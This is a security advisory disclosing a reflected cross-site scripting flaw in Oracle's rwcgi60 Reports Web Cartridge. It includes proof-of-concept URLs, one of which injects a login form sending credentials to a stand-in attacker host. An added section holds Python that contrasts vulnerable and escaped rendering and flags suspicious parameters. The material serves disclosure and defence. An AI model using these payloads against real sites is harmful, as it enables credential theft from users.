[ISecAuditors Security Advisories] Oracle Reports Web Cartridge (RWCGI60) vulnerable to XSS
=============================================
INTERNET SECURITY AUDITORS ALERT 2007-001
- Original release date: January 17, 2007
- Last revised: January 17, 2007
- Discovered by: Vicente Aguilera Diaz
- Severity: 3/5
=============================================
I. VULNERABILITY
-------------------------
Oracle Reports Web Cartridge (RWCGI60) vulnerable to XSS.
II. BACKGROUND
-------------------------
The Reports Web CGI or Web Cartridge is required for the Reports
Server when using the Oracle Application Server (OAS) to process
report requests from Web clients.
III. DESCRIPTION
-------------------------
Improper validation of the "genuser" parameter allows injection of arbitrary
script/HTML code that is executed in the client browser.
This is especially serious in authentication forms, where a malicious
user can obtain the authentication credentials of other users.
IV. PROOF OF CONCEPT
-------------------------
Original URL:
http://<oracle-server>/dev60cgi/rwcgi60?showmap&server=<oracle-reports-server>
This request returns a page with an authentication form (with User
Name, Password, and Database fields).
With the POST method (rwcgi60 accepts both methods, GET and POST),
the user sends:
username=&password=&database=&authtype=D&genuser=&server=<oracle-reports-server>&nextpage=<next-page>
A malicious user can modify the value of the "genuser" parameter and
inject arbitrary script/HTML code:
--- Example 1 ---
http://<oracle-server>/dev60cgi/rwcgi60?showmap&server=<oracle-reports-server>&genuser=User
Name<script>alert('Vulnerable to XSS attack!');</script>
--- Example 2 ---
http://<oracle-server>/dev60cgi/rwcgi60?showmap&server=<oracle-reports-server>&genuser=</form><form
name='AttackerForm'
action='http://attacker-machine.com/credentials'>User Name
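The two examples above work because the "genuser" value is written into the login page without any output encoding. The following added example (it is not Oracle's rwcgi60 code and not part of the original advisory) rebuilds a minimal stand-in for the showmap login form so the defect and its fix can be compared side by side: the same form rendered with the parameter reflected verbatim, and rendered with HTML escaping applied to every reflected value. It also includes a small check, usable for log review or a WAF rule, that flags rwcgi60 requests whose "genuser" value contains markup characters. The form layout, the hostname oracle.example and the log URLs are constructed for the example.

```python
"""Reflected XSS via the "genuser" parameter: vulnerable vs. hardened rendering.

Added example, not Oracle's rwcgi60 code. FORM_TEMPLATE is a constructed
stand-in for the showmap login form (User Name, Password, Database fields);
the exact markup of the real page is assumed, only its shape matters here.
"""
import html
from urllib.parse import urlsplit, parse_qs, unquote

FORM_TEMPLATE = (
    "<form name='LoginForm' method='POST' action='/dev60cgi/rwcgi60'>\n"
    "<input type='hidden' name='server' value='{server}'>\n"
    "<input type='hidden' name='nextpage' value='{nextpage}'>\n"
    "{genuser}: <input type='text' name='username'><br>\n"
    "Password: <input type='password' name='password'><br>\n"
    "Database: <input type='text' name='database'><br>\n"
    "<input type='submit'>\n"
    "</form>"
)


def render_login_form(genuser: str, server: str, nextpage: str,
                      harden: bool = True) -> str:
    """Render the login page.

    harden=False reflects the request parameters verbatim, which is the
    defect the advisory describes. harden=True passes every reflected value
    through html.escape (which also encodes ' and "), so a value can only
    ever appear as text, never as a tag or an attribute.
    """
    enc = html.escape if harden else (lambda s: s)
    return FORM_TEMPLATE.format(genuser=enc(genuser),
                                server=enc(server),
                                nextpage=enc(nextpage))


# Characters or tokens that never belong in a legitimate "genuser" label.
SUSPECT_MARKERS = ("<", ">", "javascript:", "onerror", "onload")


def genuser_is_suspicious(request_url: str) -> bool:
    """Return True when a request to rwcgi60 carries a "genuser" value that
    contains markup. The legitimate value is a plain field label, so a tag
    character is a strong signal for log review or a blocking rule."""
    parts = urlsplit(request_url)
    if not parts.path.endswith("/rwcgi60"):
        return False
    # keep_blank_values=True keeps the bare "showmap" token from being dropped
    values = parse_qs(parts.query, keep_blank_values=True).get("genuser", [])
    for v in values:
        # parse_qs already decoded once; decode twice more to catch
        # double- and triple-encoded payloads before matching
        decoded = unquote(unquote(v)).lower()
        if any(marker in decoded for marker in SUSPECT_MARKERS):
            return True
    return False


if __name__ == "__main__":
    # The advisory's Example 2 payload, reused here only to show it is neutralised.
    payload = "</form><form name='AttackerForm' action='http://attacker-machine.com/credentials'>User Name"
    print(render_login_form(payload, "reports01", "main", harden=False))
    print("---")
    print(render_login_form(payload, "reports01", "main", harden=True))
    # Constructed access-log URL with the parameter URL-encoded, as a proxy would record it.
    print(genuser_is_suspicious(
        "http://oracle.example/dev60cgi/rwcgi60?showmap&server=reports01"
        "&genuser=User%20Name%3Cscript%3Ealert(1)%3C/script%3E"))
```

With harden=False the output contains two <form> elements, the second pointing at the attacker's host exactly as in Example 2; with harden=True the same input renders as visible text inside the single legitimate form. Escaping at the point of output is the fix the vendor's patch has to implement; the request check is only a compensating control for systems that cannot be patched immediately.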
V. BUSINESS IMPACT
-------------------------
An attacker can spoof the session of other authenticated users,
obtain their authentication credentials, or deface the authentication
form page.
VI. SYSTEMS AFFECTED
-------------------------
Oracle9i Application Server Release 2, version 9.0.2.3
VII. SOLUTION
-------------------------
The January 2007 CPU (Critical Patch Update) contains fixes for this
vulnerability.
VIII. REFERENCES
-------------------------
- http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by
Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com).
X. REVISION HISTORY
-------------------------
January 17, 2007: Initial release
XI. DISCLOSURE TIMELINE
-------------------------
April 23, 2006: Vulnerability acquired by Internet Security Auditors.
April 24, 2006: Initial vendor notification sent.
April 29, 2006: Initial response of the vendor
January 16, 2007: The vendor fixed the vulnerability in the CPU.
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors, S.L. accepts no responsibility for any
damage caused by the use or misuse of this information.